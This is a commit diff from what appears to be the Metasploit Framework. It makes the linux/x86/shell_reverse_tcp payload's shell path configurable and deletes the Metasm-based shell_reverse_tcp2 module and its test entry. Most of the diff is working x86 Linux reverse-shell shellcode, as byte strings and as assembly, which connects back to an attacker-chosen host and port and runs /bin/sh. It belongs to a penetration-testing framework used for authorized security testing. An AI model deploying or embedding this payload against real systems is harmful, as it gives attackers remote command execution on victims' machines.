Land #6592, make linux/x86/shell_reverse_tcp's shell path configurable and remove shell_reverse_tcp2
Brent Cook
commit
8faae94338
|
|
@ -20,56 +20,65 @@ module Metasploit3
|
|||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Reverse TCP Inline',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => 'Ramon de C Valle',
|
||||
'Author' => ['Ramon de C Valle', 'joev'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 25, 'ADDR' ],
|
||||
'LPORT' => [ 32, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xdb" +# xor ebx,ebx
|
||||
"\xf7\xe3" +# mul ebx
|
||||
"\x53" +# push ebx
|
||||
"\x43" +# inc ebx
|
||||
"\x53" +# push ebx
|
||||
"\x6a\x02" +# push byte +0x2
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xb0\x66" +# mov al,0x66
|
||||
"\xcd\x80" +# int 0x80
|
||||
"\x93" +# xchg eax,ebx
|
||||
"\x59" +# pop ecx
|
||||
"\xb0\x3f" +# mov al,0x3f
|
||||
"\xcd\x80" +# int 0x80
|
||||
"\x49" +# dec ecx
|
||||
"\x79\xf9" +# jns 0x11
|
||||
"\x68\x7f\x00\x00\x01" +# push dword 0x100007f
|
||||
"\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xb0\x66" +# mov al,0x66
|
||||
"\x50" +# push eax
|
||||
"\x51" +# push ecx
|
||||
"\x53" +# push ebx
|
||||
"\xb3\x03" +# mov bl,0x3
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xcd\x80" +# int 0x80
|
||||
"\x52" +# push edx
|
||||
"\x68\x2f\x2f\x73\x68" +# push dword 0x68732f2f
|
||||
"\x68\x2f\x62\x69\x6e" +# push dword 0x6e69622f
|
||||
"\x89\xe3" +# mov ebx,esp
|
||||
"\x52" +# push edx
|
||||
"\x53" +# push ebx
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xb0\x0b" +# mov al,0xb
|
||||
"\xcd\x80" # int 0x80
|
||||
}
|
||||
))
|
||||
'Session' => Msf::Sessions::CommandShellUnix
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ])
|
||||
])
|
||||
end
|
||||
|
||||
def generate
|
||||
# pad the shell path to a multiple of 4 with slashes
|
||||
shell = datastore['CMD']
|
||||
remainder = shell.bytes.length % 4
|
||||
if remainder == 0 then remainder = 4 end
|
||||
shell_padded = ("/" * (4-remainder)) + shell
|
||||
|
||||
"\x31\xdb" +# xor ebx,ebx
|
||||
"\xf7\xe3" +# mul ebx
|
||||
"\x53" +# push ebx
|
||||
"\x43" +# inc ebx
|
||||
"\x53" +# push ebx
|
||||
"\x6a\x02" +# push byte +0x2
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xb0\x66" +# mov al,0x66 (sys_socketcall)
|
||||
"\xcd\x80" +# int 0x80
|
||||
"\x93" +# xchg eax,ebx
|
||||
"\x59" +# pop ecx
|
||||
"\xb0\x3f" +# mov al,0x3f (sys_dup2)
|
||||
"\xcd\x80" +# int 0x80
|
||||
"\x49" +# dec ecx
|
||||
"\x79\xf9" +# jns 0x11
|
||||
"\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push ip addr
|
||||
"\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push port
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xb0\x66" +# mov al,0x66 (sys_socketcall)
|
||||
"\x50" +# push eax
|
||||
"\x51" +# push ecx
|
||||
"\x53" +# push ebx
|
||||
"\xb3\x03" +# mov bl,0x3
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xcd\x80" +# int 0x80
|
||||
"\x52" +# push edx
|
||||
|
||||
# Split shellname into 4-byte words and push them one-by-one
|
||||
# on to the stack
|
||||
shell_padded.bytes.reverse.each_slice(4).map do |word|
|
||||
"\x68" + word.reverse.pack('C*')
|
||||
end.join +
|
||||
|
||||
"\x89\xe3" +# mov ebx,esp
|
||||
"\x52" +# push edx
|
||||
"\x53" +# push ebx
|
||||
"\x89\xe1" +# mov ecx,esp
|
||||
"\xb0\x0b" +# mov al,0xb (execve)
|
||||
"\xcd\x80" # int 0x80
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -1,98 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'metasm'
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
CachedSize = 70
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
# Remark: this function seems to be called a LOT, even before the shellcode is used.
|
||||
# We would better implement some caching.
|
||||
|
||||
# We decoded skape's shellcode by using irb -r metasm-shell
|
||||
# and: puts shellcode.decode
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Reverse TCP Inline - Metasm Demo',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => ['skape', 'Yoann Guillot', 'Julien Tinnes <julien[at]cr0.org>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 0, 'ADDR' ],
|
||||
'LPORT' => [ 0, 'n' ],
|
||||
},
|
||||
'Assembly' => <<EOS
|
||||
xor ebx, ebx ; @00000000 31db
|
||||
push ebx ; @00000002 53
|
||||
inc ebx ; @00000003 43
|
||||
push ebx ; @00000004 53
|
||||
push 2 ; @00000005 6a02
|
||||
push 66h ; @00000007 6a66
|
||||
pop eax ; @00000009 58
|
||||
mov ecx, esp ; @0000000a 89e1
|
||||
int 80h ; @0000000c cd80
|
||||
xchg ebx, eax ; @0000000e 93
|
||||
pop ecx ; @0000000f 59
|
||||
|
||||
; Xrefs: 0000000f, 00000015
|
||||
xref_00000010_uuidfdbd8:
|
||||
mov al, 3fh ; @00000010 b03f
|
||||
int 80h ; @00000012 cd80
|
||||
dec ecx ; @00000014 49
|
||||
jns xref_00000010_uuidfdbd8 ; @00000015 79f9 -- to 10h
|
||||
|
||||
; Xrefs: 00000015
|
||||
pop ebx ; @00000017 5b
|
||||
pop edx ; @00000018 5a
|
||||
push LHOST ; @00000019 687f000001
|
||||
push.i16 LPORT ; @0000001e 6668bfbf
|
||||
inc ebx ; @00000022 43
|
||||
push bx ; @00000023 6653
|
||||
mov ecx, esp ; @00000025 89e1
|
||||
mov al, 66h ; @00000027 b066
|
||||
push eax ; @00000029 50
|
||||
push ecx ; @0000002a 51
|
||||
push ebx ; @0000002b 53
|
||||
mov ecx, esp ; @0000002c 89e1
|
||||
inc ebx ; @0000002e 43
|
||||
int 80h ; @0000002f cd80
|
||||
push edx ; @00000031 52
|
||||
push 68732f2fh ; @00000032 682f2f7368
|
||||
push 6e69622fh ; @00000037 682f62696e
|
||||
mov ebx, esp ; @0000003c 89e3
|
||||
push edx ; @0000003e 52
|
||||
push ebx ; @0000003f 53
|
||||
mov ecx, esp ; @00000040 89e1
|
||||
mov al, 0bh ; @00000042 b00b
|
||||
int 80h ; @00000044 cd80
|
||||
EOS
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
# hardcode the size of the encoded payload, otherwise the shellcode is assembled during msf initialization
|
||||
def size
|
||||
#puts "size of #{name}: #{super()}"
|
||||
103
|
||||
end
|
||||
end
|
||||
|
|
@ -1637,16 +1637,6 @@ RSpec.describe 'modules/payloads', :content do
|
|||
reference_name: 'linux/x86/shell_reverse_tcp'
|
||||
end
|
||||
|
||||
context 'linux/x86/shell_reverse_tcp2' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
'singles/linux/x86/shell_reverse_tcp2'
|
||||
],
|
||||
dynamic_size: false,
|
||||
modules_pathname: modules_pathname,
|
||||
reference_name: 'linux/x86/shell_reverse_tcp2'
|
||||
end
|
||||
|
||||
context 'mainframe/shell_reverse_tcp' do
|
||||
it_should_behave_like 'payload cached size is consistent',
|
||||
ancestor_reference_names: [
|
||||
|
|
|
|||
Loading…
Reference in New Issue